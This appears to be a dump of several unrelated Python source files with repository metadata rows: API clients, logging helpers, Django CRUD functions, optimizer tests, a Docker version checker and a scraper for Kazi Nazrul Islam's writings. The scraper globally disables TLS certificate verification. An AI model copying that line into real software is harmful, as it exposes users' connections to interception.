from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
| 31 | 75 | 0.806452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
7318340689a601475670cd96bc3a15da21a3e8a4 | 2,438 | py | Python | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| 1 | 2021-06-02T10:00:35.000Z | 2021-06-02T10:00:35.000Z | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| null | null | null | pyzayo/svcinv_mixin.py | jeremyschulman/pyzayo | 37869daf6ef2df8e0898bae7c3ddbb0139840751 | [
"Apache-2.0"
]
| null | null | null | """
This file contains the Zayo Service Inventory related API endpoints.
References
----------
Docs
http://54.149.224.75/wp-content/uploads/2020/02/Service-Inventory-Wiki.pdf
"""
# -----------------------------------------------------------------------------
# System Imports
# -----------------------------------------------------------------------------
from typing import List, Dict
# -----------------------------------------------------------------------------
# Public Imports
# -----------------------------------------------------------------------------
from first import first
# -----------------------------------------------------------------------------
# Private Imports
# -----------------------------------------------------------------------------
from pyzayo.base_client import ZayoClientBase
from pyzayo.consts import ZAYO_SM_ROUTE_SERVICES
# -----------------------------------------------------------------------------
# Module Exports
# -----------------------------------------------------------------------------
__all__ = ["ZayoServiceInventoryMixin"]
class ZayoServiceInventoryMixin(ZayoClientBase):
""" Supports the Service-Inventory API endpoints """
def get_services(self, **params) -> List[Dict]:
"""
        Retrieve the service-inventory records matching the given `params`
        criteria, or all records when no criteria are provided.
Other Parameters
----------------
key-value options as defined by the "existing-services" API endpoint.
The `filter` parameter, for example, supports the following
API record fields:
* status
* productGroup
* productCatagory
* product
* term
"""
return self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params)
def get_service_by_circuit_id(self, by_circuit_id: str, **params):
"""
        Locate the service associated with the given circuit ID.
Parameters
----------
by_circuit_id: str
The circuit ID string value
Other Parameters
----------------
Same as get_services() method, see for details.
Returns
-------
The service record in dict form from API.
"""
return first(
rec
for rec in self.paginate_records(url=ZAYO_SM_ROUTE_SERVICES, **params)
if rec["components"][0]["circuitId"] == by_circuit_id
)
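

# A minimal usage sketch; `zapi` stands in for whatever concrete client mixes
# this class in, and the circuit ID value is an illustrative placeholder.
#
#   all_svcs = zapi.get_services()
#   one_svc = zapi.get_service_by_circuit_id("<circuit-id>")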
| 30.475 | 82 | 0.455291 | 1,341 | 0.550041 | 0 | 0 | 0 | 0 | 0 | 0 | 1,807 | 0.741181 |
7318d12083b715d2887f9b7cf5b2559fad4d08c0 | 6,236 | py | Python | pychron/core/helpers/logger_setup.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
]
| 1 | 2019-02-27T21:57:44.000Z | 2019-02-27T21:57:44.000Z | pychron/core/helpers/logger_setup.py | aelamspychron/pychron | ad87c22b0817c739c7823a24585053041ee339d5 | [
"Apache-2.0"
]
| 20 | 2020-09-09T20:58:39.000Z | 2021-10-05T17:48:37.000Z | pychron/core/helpers/logger_setup.py | AGESLDEO/pychron | 1a81e05d9fba43b797f335ceff6837c016633bcf | [
"Apache-2.0"
]
| null | null | null | # ===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# =============enthought library imports=======================
# =============standard library imports ========================
from __future__ import absolute_import
import logging
import os
import shutil
from logging.handlers import RotatingFileHandler
from pychron.core.helpers.filetools import list_directory, unique_path2
from pychron.paths import paths
NAME_WIDTH = 40
gFORMAT = '%(name)-{}s: %(asctime)s %(levelname)-9s (%(threadName)-10s) %(message)s'.format(NAME_WIDTH)
gLEVEL = logging.DEBUG
def simple_logger(name):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
h = logging.StreamHandler()
h.setFormatter(logging.Formatter(gFORMAT))
logger.addHandler(h)
return logger
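# --- Illustrative usage sketch; not part of the original module. ---
# The logger name below is an assumption made only for this demo.
def _demo_simple_logger():
    log = simple_logger('demo')
    log.debug('message rendered with the module-level gFORMAT layout')
    return log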
def get_log_text(n):
root = logging.getLogger()
for h in root.handlers:
if isinstance(h, RotatingFileHandler):
with open(h.baseFilename, 'rb') as rfile:
return tail(rfile, n)
def tail(f, lines=20):
"""
http://stackoverflow.com/questions/136168/get-last-n-lines-of-a-file-with-python-similar-to-tail
"""
total_lines_wanted = lines
BLOCK_SIZE = 1024
f.seek(0, 2)
block_end_byte = f.tell()
lines_to_go = total_lines_wanted
block_number = -1
blocks = [] # blocks of size BLOCK_SIZE, in reverse order starting
# from the end of the file
while lines_to_go > 0 and block_end_byte > 0:
if block_end_byte - BLOCK_SIZE > 0:
# read the last block we haven't yet read
f.seek(block_number * BLOCK_SIZE, 2)
blocks.append(f.read(BLOCK_SIZE))
else:
            # file too small, start from the beginning
f.seek(0, 0)
# only read what was not read
blocks.append(f.read(block_end_byte))
lines_found = blocks[-1].count(b'\n')
lines_to_go -= lines_found
block_end_byte -= BLOCK_SIZE
block_number -= 1
all_read_text = b''.join(reversed(blocks))
return b'\n'.join(all_read_text.splitlines()[-total_lines_wanted:]).decode('utf-8')
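# --- Illustrative usage sketch; not part of the original module. ---
# ``tail`` only needs a seekable binary file object, so an in-memory buffer
# (an assumption made for this demo) is enough to exercise it.
def _demo_tail():
    import io
    buf = io.BytesIO(b''.join(b'line %d\n' % i for i in range(100)))
    # returns the last three lines: 'line 97\nline 98\nline 99'
    return tail(buf, lines=3)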
# def anomaly_setup(name):
# ld = logging.Logger.manager.loggerDict
# print 'anomaly setup ld={}'.format(ld)
# if name not in ld:
# bdir = paths.log_dir
# name = add_extension(name, '.anomaly')
# apath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log')
# logger = logging.getLogger('anomalizer')
# h = logging.FileHandler(apath)
# logger.addHandler(h)
def logging_setup(name, use_archiver=True, root=None, use_file=True, **kw):
"""
"""
# set up deprecation warnings
# import warnings
# warnings.simplefilter('default')
bdir = paths.log_dir if root is None else root
# make sure we have a log directory
# if not os.path.isdir(bdir):
# os.mkdir(bdir)
if use_archiver:
# archive logs older than 1 month
# lazy load Archive because of circular dependency
from pychron.core.helpers.archiver import Archiver
a = Archiver(archive_days=14,
archive_months=1,
root=bdir)
a.clean()
if use_file:
# create a new logging file
logname = '{}.current.log'.format(name)
logpath = os.path.join(bdir, logname)
if os.path.isfile(logpath):
backup_logpath, _cnt = unique_path2(bdir, name, delimiter='-', extension='.log', width=5)
shutil.copyfile(logpath, backup_logpath)
os.remove(logpath)
ps = list_directory(bdir, filtername=logname, remove_extension=False)
for pi in ps:
_h, t = os.path.splitext(pi)
v = os.path.join(bdir, pi)
shutil.copyfile(v, '{}{}'.format(backup_logpath, t))
os.remove(v)
root = logging.getLogger()
root.setLevel(gLEVEL)
shandler = logging.StreamHandler()
handlers = [shandler]
if use_file:
rhandler = RotatingFileHandler(
logpath, maxBytes=1e7, backupCount=50)
handlers.append(rhandler)
fmt = logging.Formatter(gFORMAT)
for hi in handlers:
hi.setLevel(gLEVEL)
hi.setFormatter(fmt)
root.addHandler(hi)
def add_root_handler(path, level=None, strformat=None, **kw):
if level is None:
level = gLEVEL
    if strformat is None:
strformat = gFORMAT
root = logging.getLogger()
handler = logging.FileHandler(path, **kw)
handler.setLevel(level)
handler.setFormatter(logging.Formatter(strformat))
root.addHandler(handler)
return handler
def remove_root_handler(handler):
root = logging.getLogger()
root.removeHandler(handler)
def new_logger(name):
name = '{:<{}}'.format(name, NAME_WIDTH)
l = logging.getLogger(name)
l.setLevel(gLEVEL)
return l
def wrap(items, width=40, indent=90, delimiter=','):
"""
wrap a list
"""
if isinstance(items, str):
items = items.split(delimiter)
gcols = iter(items)
t = 0
rs = []
r = []
while 1:
try:
c = next(gcols)
t += 1 + len(c)
if t < width:
r.append(c)
else:
rs.append(','.join(r))
r = [c]
t = len(c)
except StopIteration:
rs.append(','.join(r))
break
return ',\n{}'.format(' ' * indent).join(rs)
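# --- Illustrative usage sketch; not part of the original module. ---
# The input string and the small width/indent values are assumptions for the demo.
def _demo_wrap():
    # returns 'a,b,\n    c,d,\n    e,f' -- chunks capped near ``width``,
    # continuation lines indented by ``indent`` spaces
    return wrap('a,b,c,d,e,f', width=5, indent=4)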
# ============================== EOF ===================================
| 29.837321 | 103 | 0.591725 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,109 | 0.338198 |
7318f31264c2155178f9f5bd08d307cfd0e1de20 | 7,980 | py | Python | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | picmodels/models/care_advisors/case_management_models/sequence_models/services/create_update_delete.py | bbcawodu/careadvisors-backend | 5ebd3c0fc189b2486cea92b2a13c0bd8a0ee3838 | [
"MIT"
]
| null | null | null | import picmodels
def create_row_w_validated_params(cls, validated_params, rqst_errors):
if 'name' not in validated_params:
rqst_errors.append("'name' is a required key in the validated_params argument")
return None
if cls.check_for_rows_with_given_name(validated_params['name'], rqst_errors):
return None
row = cls()
row.name = validated_params['name']
row.save()
if 'add_steps' in validated_params:
steps_info = validated_params['add_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_given_rows_or_matching_step_number(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors)
if rqst_errors:
break
row.steps.add(step_row)
if rqst_errors:
row.delete()
return None
row.save()
return row
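# --- Illustrative sketch of the expected input; not part of the original module. ---
# The name and the step ids below are made-up values; 'add_steps' holds the ids
# of existing StepsForCMSequences rows (the code above sorts them by step_number).
def _demo_validated_params():
    return {
        'name': 'Enrollment follow-up sequence',
        'add_steps': [3, 7],
    }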
def update_row_w_validated_params(cls, validated_params, rqst_errors):
if 'id' not in validated_params:
rqst_errors.append("'id' is a required key in the validated_params argument")
return None
rqst_id = validated_params['id']
try:
row = cls.objects.get(id=rqst_id)
except cls.DoesNotExist:
rqst_errors.append('Row does not exist for the id: {}'.format(rqst_id))
return None
if 'add_steps' in validated_params:
steps_info = validated_params['add_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_given_rows_or_matching_step_number(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
check_steps_for_row_with_previous_step_number(row, step_row, rqst_errors)
if rqst_errors:
break
row.steps.add(step_row)
elif 'remove_steps' in validated_params:
steps_info = validated_params['remove_steps']
cmstepsforsequences_rows = []
for step_id in steps_info:
cmstepsforsequences_rows.append(
get_stepsforcmsequences_row_with_given_id(step_id, rqst_errors)
)
if not rqst_errors:
check_steps_for_not_given_rows(
row.steps.all(),
cmstepsforsequences_rows,
row,
rqst_errors
)
if not rqst_errors:
cmstepsforsequences_rows = sorted(cmstepsforsequences_rows, key=lambda k: k.step_number)
for step_row in cmstepsforsequences_rows:
row.steps.remove(step_row)
if rqst_errors:
return None
if 'name' in validated_params:
row.name = validated_params['name']
if cls.check_for_rows_with_given_name(row.name, rqst_errors, rqst_id):
return None
row.save()
return row
def delete_row_w_validated_params(cls, validated_params, rqst_errors):
if 'id' not in validated_params:
rqst_errors.append("'id' is a required key in the validated_params argument")
return
rqst_id = validated_params['id']
try:
row = cls.objects.get(id=rqst_id)
row.delete()
except cls.DoesNotExist:
rqst_errors.append('Row does not exist for the id: {!s}'.format(str(rqst_id)))
def check_for_rows_with_given_name(cls, name, rqst_errors, current_id=None):
found_matching_rows = False
matching_rows = cls.objects.filter(
name__iexact=name
)
if matching_rows:
found_matching_rows = True
row_ids = []
len_of_row_qset = len(matching_rows)
for row in matching_rows:
row_ids.append(row.id)
if len_of_row_qset > 1:
rqst_errors.append(
"Multiple rows with name: {} already exist in db. (Hint - Delete all but one and modify the remaining) id's: {}".format(
name, row_ids))
else:
if not current_id or current_id not in row_ids:
rqst_errors.append(
"Row with name: {} already exists in db. (Hint - Modify that entry) id: {}".format(
name, row_ids[0]))
else:
found_matching_rows = False
return found_matching_rows
def get_stepsforcmsequences_row_with_given_id(row_id, rqst_errors):
row = None
if row_id:
try:
row = picmodels.models.StepsForCMSequences.objects.get(id=row_id)
except picmodels.models.StepsForCMSequences.DoesNotExist:
row = None
rqst_errors.append("No StepsForCMSequences row found with id: {}".format(row_id))
return row
def check_steps_for_given_rows_or_matching_step_number(cur_steps_qset, given_steps_list, row, rqst_errors):
for cm_step in given_steps_list:
if rqst_errors:
break
if cm_step in cur_steps_qset:
rqst_errors.append(
"cm_step with id: {} already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format(
cm_step.id,
row.id,
)
)
else:
check_steps_for_row_with_given_step_number(cur_steps_qset, cm_step, row, rqst_errors)
def check_steps_for_not_given_rows(cur_steps_qset, given_steps_list, row, rqst_errors):
for cm_step in given_steps_list:
if cm_step not in cur_steps_qset:
rqst_errors.append(
"cm_step with id: {} does not exists in row id {}'s steps list (Hint - remove from parameter 'remove_stepst' list)".format(
cm_step.id,
row.id,
)
)
def check_steps_for_row_with_given_step_number(cur_steps_qset, given_step_row, row, rqst_errors):
for cm_step in cur_steps_qset:
if cm_step.step_number == given_step_row.step_number:
rqst_errors.append(
"cm_step with id: {} has a step_number of: {}, which already exists in row id {}'s steps list (Hint - remove from parameter 'add_steps' list)".format(
given_step_row.id,
given_step_row.step_number,
row.id,
)
)
break
def check_steps_for_row_with_previous_step_number(sequence_row, given_step_row, rqst_errors):
previous_step_found = False
current_step_number = given_step_row.step_number
if current_step_number <= 1:
return None
previous_step_number = current_step_number - 1
for cm_step in sequence_row.steps.all():
if cm_step.step_number == previous_step_number:
previous_step_found = True
break
if not previous_step_found:
rqst_errors.append(
"Sequence with id: {} does not have a step with 1 less than step row: {}'s step_number (Hint - remove from parameter 'add_steps' list)".format(
sequence_row.id,
given_step_row.return_values_dict(),
)
)
| 34.545455 | 166 | 0.61817 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,098 | 0.137594 |
731a5b94603a881cbdad31e6b399fc2db646e99b | 4,162 | py | Python | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | elegy/optimizer_test.py | sooheon/elegy | cad6f832cac1a34684c4f4f2c4a386cbfa817623 | [
"Apache-2.0"
]
| null | null | null | import jax
import elegy
import unittest
import numpy as np
import jax.numpy as jnp
import optax
class MLP(elegy.Module):
"""Standard LeNet-300-100 MLP network."""
n1: int
n2: int
def __init__(self, n1: int = 3, n2: int = 4):
super().__init__()
self.n1 = n1
self.n2 = n2
def call(self, image: jnp.ndarray, training: bool):
x = image.astype(jnp.float32) / 255.0
x = jnp.reshape(x, [x.shape[0], -1])
x = elegy.nn.Linear(self.n1)(x)
x = elegy.nn.BatchNormalization()(x)
x = jax.nn.relu(x)
x = elegy.nn.Linear(self.n2)(x)
x = jax.nn.relu(x)
x = elegy.nn.Linear(10)(x)
return x
class OptimizerTest(unittest.TestCase):
def test_optimizer(self):
optax_op = optax.adam(1e-3)
lr_schedule = lambda step, epoch: step / 3
optimizer = elegy.Optimizer(optax_op, lr_schedule=lr_schedule)
params = np.random.uniform((3, 4))
grads = np.random.uniform((3, 4))
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(rng, params)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 2 / 3)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 3 / 3)
def test_optimizer_epoch(self):
optax_op = optax.adam(1e-3)
lr_schedule = lambda step, epoch: epoch
optimizer = elegy.Optimizer(
optax_op, lr_schedule=lr_schedule, steps_per_epoch=2
)
params = np.random.uniform((3, 4))
grads = np.random.uniform((3, 4))
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(
rng=rng,
net_params=params,
)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 0)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert jnp.allclose(optimizer.current_lr(optimizer_states), 1)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
def test_optimizer_chain(self):
optimizer = elegy.Optimizer(
optax.sgd(0.1),
optax.clip(0.5),
)
params = np.zeros(shape=(3, 4))
grads = np.ones(shape=(3, 4)) * 100_000
rng = elegy.RNGSeq(42)
optimizer_states = optimizer.init(
rng=rng,
net_params=params,
)
params, optimizer_states = optimizer.apply(params, grads, optimizer_states, rng)
assert np.all(-0.5 <= params) and np.all(params <= 0.5)
def test_lr_logging(self):
model = elegy.Model(
module=MLP(n1=3, n2=1),
loss=elegy.losses.SparseCategoricalCrossentropy(from_logits=True),
metrics=elegy.metrics.SparseCategoricalAccuracy(),
optimizer=elegy.Optimizer(
optax.adamw(1.0, b1=0.95),
lr_schedule=lambda step, epoch: jnp.array(1e-3),
),
run_eagerly=True,
)
X = np.random.uniform(size=(5, 7, 7))
y = np.random.randint(10, size=(5,))
history = model.fit(
x=X,
y=y,
epochs=1,
steps_per_epoch=1,
batch_size=5,
validation_data=(X, y),
shuffle=True,
verbose=0,
)
assert "lr" in history.history
assert np.allclose(history.history["lr"], 1e-3)
| 30.602941 | 88 | 0.606439 | 4,059 | 0.975252 | 0 | 0 | 0 | 0 | 0 | 0 | 49 | 0.011773 |
731a5f37b2d3af866a1a81886741f91cddda5c09 | 6,929 | py | Python | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 54 | 2015-03-08T23:45:21.000Z | 2021-01-11T12:35:07.000Z | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 4 | 2015-04-10T08:58:29.000Z | 2015-11-08T08:34:55.000Z | scripts/version.py | nfnty/docker | cdc68f57fdb6bd472b78d6ef6cbc77f430bd5089 | [
"MIT"
]
| 16 | 2015-04-08T23:54:07.000Z | 2020-04-08T22:03:12.000Z | #!/usr/bin/python3
''' Check image package versions '''
import argparse
import distutils.version
import re
import subprocess
from typing import Any, Dict, Sequence, Tuple
import lxml.html # type: ignore
import requests
from termcolor import cprint
from utils.image import IMAGES, path_dockerfile
TIMEOUT = (31, 181) # (Connect, Read)
HEADERS = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0'}
def args_parse(arguments: Sequence[str] = None) -> argparse.Namespace:
''' Parse arguments '''
par0 = argparse.ArgumentParser(description='Image package version checker')
method = par0.add_mutually_exclusive_group(required=False)
method.add_argument(
'--include', metavar='IMAGE', action='append', choices=IMAGES.keys(),
help='Include image(s)',
)
method.add_argument(
'--exclude', metavar='IMAGE', action='append', choices=IMAGES.keys(),
help='Exclude image(s)',
)
return par0.parse_args(arguments)
def fetch(url: str, timeout: Tuple[int, int]) -> Any:
''' Fetch URL '''
try:
response = requests.get(url, headers=HEADERS, timeout=timeout)
response.raise_for_status()
except (requests.exceptions.Timeout, requests.exceptions.HTTPError) as error:
raise RuntimeError('fetch: {0:s}\n{1:s}'.format(str(error), str(error.response.content)))
except OSError as error:
raise RuntimeError('fetch: {0:s}'.format(str(error)))
return lxml.html.document_fromstring(response.content)
def document_parse(document: Any, xpath: str, attribute: str,
regex: str) -> distutils.version.LooseVersion:
''' xpath version extractor '''
nodes = document.xpath(xpath)
if not nodes:
raise RuntimeError('Incorrect xpath: No nodes')
versions = []
for node in nodes:
if attribute:
string = node.get(attribute)
elif isinstance(node, str):
string = node
else:
string = node.text
if regex:
obj = re.search(regex, string,
flags=(re.MULTILINE | re.DOTALL)) # pylint: disable=no-member
if not obj:
continue
elif len(obj.groups()) > 1:
raise RuntimeError('Incorrect regex: More than 1 capture group')
string = obj.group(1)
if not string:
raise RuntimeError('Incorrect regex: Invalid capture group')
versions.append(distutils.version.LooseVersion(string))
if not versions:
raise RuntimeError('No matching versions')
version: distutils.version.LooseVersion = sorted(versions, reverse=True)[0]
if not version or not hasattr(version, 'vstring'):
raise RuntimeError('Version is invalid')
return version
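# --- Illustrative usage sketch; not part of the original script. ---
# Parses a literal HTML snippet instead of a fetched page; the snippet and the
# regex below are assumptions made only for this demo.
def _demo_document_parse() -> distutils.version.LooseVersion:
    ''' Show document_parse() extracting LooseVersion('1.2.3') from an href '''
    document = lxml.html.document_fromstring(
        '<html><body><a href="pkg-1.2.3.tar.gz">pkg 1.2.3</a></body></html>')
    return document_parse(document, '//a', 'href', r'pkg-([\d.]+)\.tar\.gz')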
def version_scrape(url: str, xpath: str, attribute: str,
regex: str) -> distutils.version.LooseVersion:
''' Scrape latest version from url '''
document = fetch(url, TIMEOUT)
return document_parse(document, xpath, attribute, regex)
def version_pacman(package: str) -> Dict[str, distutils.version.LooseVersion]:
''' Return dict with repository versions of package '''
try:
output = subprocess.run([
'/usr/bin/expac', '--sync', '--search',
'%n %r %v',
r'^{0:s}$'.format(re.escape(package)),
], check=True, stdout=subprocess.PIPE).stdout.decode('UTF-8')
except subprocess.CalledProcessError:
raise RuntimeError('{0:s} not in any repository'.format(package))
versions: Dict[str, distutils.version.LooseVersion] = {}
for line in output.splitlines():
name, repo, version = line.split()
if name == package:
versions[repo] = distutils.version.LooseVersion(version)
return versions
def dockerfile_update(path: str, variable: str, version: str) -> None:
''' Update Dockerfiles with current version '''
with open(path, 'r') as fobj:
newfile, found = re.subn(
r'{0:s}=\'\S*\''.format(variable),
'{0:s}=\'{1:s}\''.format(variable, version),
fobj.read(),
)
if not found:
raise ValueError('Did not find ENV variable')
elif found > 1:
raise ValueError('More than 1: {0:s}'.format(variable))
with open(path, 'w') as fobj:
fobj.write(newfile)
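# --- Illustrative usage sketch; not part of the original script. ---
# The temporary Dockerfile path and the VERSION_FOO variable are assumptions
# made only for this demo.
def _demo_dockerfile_update(path: str = '/tmp/Dockerfile.demo') -> str:
    ''' Rewrite one ENV-style assignment in place and return the new content '''
    with open(path, 'w') as fobj:
        fobj.write("FROM archlinux\nENV VERSION_FOO='1.0.0'\n")
    dockerfile_update(path, 'VERSION_FOO', '1.2.3')
    with open(path, 'r') as fobj:
        return fobj.read()  # now contains VERSION_FOO='1.2.3'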
def main() -> None: # pylint: disable=too-many-branches
''' Main '''
subprocess.check_call(['/usr/bin/sudo', '/usr/bin/pacman', '--sync', '--refresh'])
if ARGS.include:
images = {image: config for image, config in IMAGES.items() if image in ARGS.include}
elif ARGS.exclude:
images = {image: config for image, config in IMAGES.items() if image not in ARGS.exclude}
else:
images = IMAGES
for image, image_dict in sorted(images.items(), key=lambda item: item[0]):
cprint('\n{0:s}'.format(image), 'white', attrs=['underline'])
if 'Check' in image_dict and not image_dict['Check']:
print('Not checked!')
continue
if 'Packages' not in image_dict:
print('No packages!')
continue
for package, package_dict in image_dict['Packages'].items():
cprint('{0:s}:'.format(package), 'yellow')
for source, source_dict in package_dict['Sources'].items():
try:
source_dict['Version'] = version_scrape(
source_dict['URL'],
source_dict['XPath'],
source_dict['Attribute'] if 'Attribute' in source_dict else None,
source_dict['Regex'] if 'Regex' in source_dict else None,
)
except RuntimeError as error:
cprint('{0:s}: {1:s}'.format(source, str(error)), 'red')
source_dict['Version'] = None
try:
for repo, version in version_pacman(package).items():
package_dict['Sources'][repo] = {'Version': version}
except RuntimeError as error:
cprint(str(error), 'red')
for source, source_dict in package_dict['Sources'].items():
print('{0:15s}{1:s}'.format(
source,
source_dict['Version'].vstring if source_dict['Version'] else 'None',
))
if not package_dict['Sources'][package_dict['Download']]['Version']:
cprint('No Version for Download: {0:s}'.format(
package_dict['Download']), 'red')
continue
dockerfile_update(
path_dockerfile(image),
package_dict['Variable'],
package_dict['Sources'][package_dict['Download']]['Version'].vstring,
)
if __name__ == '__main__':
ARGS = args_parse()
main()
| 35.533333 | 97 | 0.593159 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,387 | 0.200173 |
731bcc2e7423a542f77047dce4151ada325579ea | 2,441 | py | Python | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | nazrul.py | rakesh0703/Content_Parser_of_works_of_kazi_nazrul | c3e2060effe7b7576ee5b034a9aba3df648d6358 | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
from bs4 import BeautifulSoup
import sys
import os
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
import urllib.parse,urllib.request,urllib.error
# Landing page of the Nazrul Rachanabali archive; its slide-door menu lists the top-level sections.
base="https://nazrul-rachanabali.nltr.org/"
page=urllib.request.urlopen(base).read()
soup=BeautifulSoup(page,'html5lib')
ba=soup.find_all("ul",{"class":["slidedoormenu"]})
#print(ba)
d=soup.div.ul.find_all('a')
#type(d[3])
article_page=(d[3]).get("href")
#soup.div.ul.li.a
newurl_2=base+article_page
page1=urllib.request.urlopen(newurl_2).read()
soup1=BeautifulSoup(page1,'html5lib')
e=soup1.find_all('a')
# arr1 collects the absolute URLs of the selected menu entries, arr4 their titles.
arr1=[]
arr4=[]
for link in e[1:9]:
f=link.get('href')
f=base+f
arr1.append(f)
arr4.append(link.get_text())
#for k in arr2:
# For every collected section: open it, gather the work links inside its 'data' div,
# then page through each work (up to 110 pages) and save the text under D:\<section>\<work>.
for m in range(0,len(arr4)):
page1=urllib.request.urlopen(arr1[m]).read()
soup1=BeautifulSoup(page1,'html5lib')
x=soup1.find_all('div',id='data')
arr2=[];
arr3=[];
for i in x:
g=i.find_all('a')
for k in g[:-7]:
arr2.append(k.get('href'))
arr3.append(k.get_text())
for z in range(0,len(arr3)):
final_url=base+arr2[z]
#==============================================================================
# page1=urllib.request.urlopen(final_url).read()
# soup1=BeautifulSoup(page1,'html5lib')
# head = soup1.find_all("p",class_="head1")
# headd=head[0].get_text()
#==============================================================================
filenam = "D:\%s\%s"%(arr4[m],arr3[z])
if not os.path.exists(filenam):
os.makedirs(filenam)
for i in range(0,110):
if arr3[z].endswith(" "):
arr3[z]=arr3[z][:-1]
filename = "D:\%s\%s\%s_%d.txt"%(arr4[m],arr3[z],arr3[z],i)
fi = open(filename, "wb")
page1=urllib.request.urlopen(final_url).read()
soup1=BeautifulSoup(page1,'html5lib')
final_url=base+arr2[z]
h=soup1.find_all('div',id="data")
for j in h:
fi.write(j.text.encode("utf-8"))
s=j.text
if not s.split():
break
a,b=final_url.split('1&titleid=')
final_url=a+str(i+1)+"&titleid="+b
print('************'+final_url+'***********')
fi.close()
| 29.059524 | 87 | 0.530111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 702 | 0.287587 |
731bee30cd85e8877da89abd76314f81852e3106 | 730 | py | Python | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | algoplex/api/order.py | dmitryaleks/algo-plex | c83421642fc1ac11e558126ec73909b175b07862 | [
"BSD-2-Clause"
]
| null | null | null | class Order():
def __init__(self, side, pair, size, price, stop_loss_price, id):
self.side = side
self.pair = pair
self.size = size
self.price = price
self.stop_loss_price = stop_loss_price
self.id = id
self.fills = []
def define_id(self, id):
self.id = id
def add_fill(self, execution):
self.fills.append(execution)
def get_fill_price(self):
nominator = sum(map(lambda f: f.size * f.price, self.fills))
fill_price = nominator/self.get_filled_quantity()
return fill_price
def get_filled_quantity(self):
return sum(map(lambda f: f.size, self.fills))
def get_fills(self):
return self.fills
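# --- Illustrative usage sketch; not part of the original module. ---
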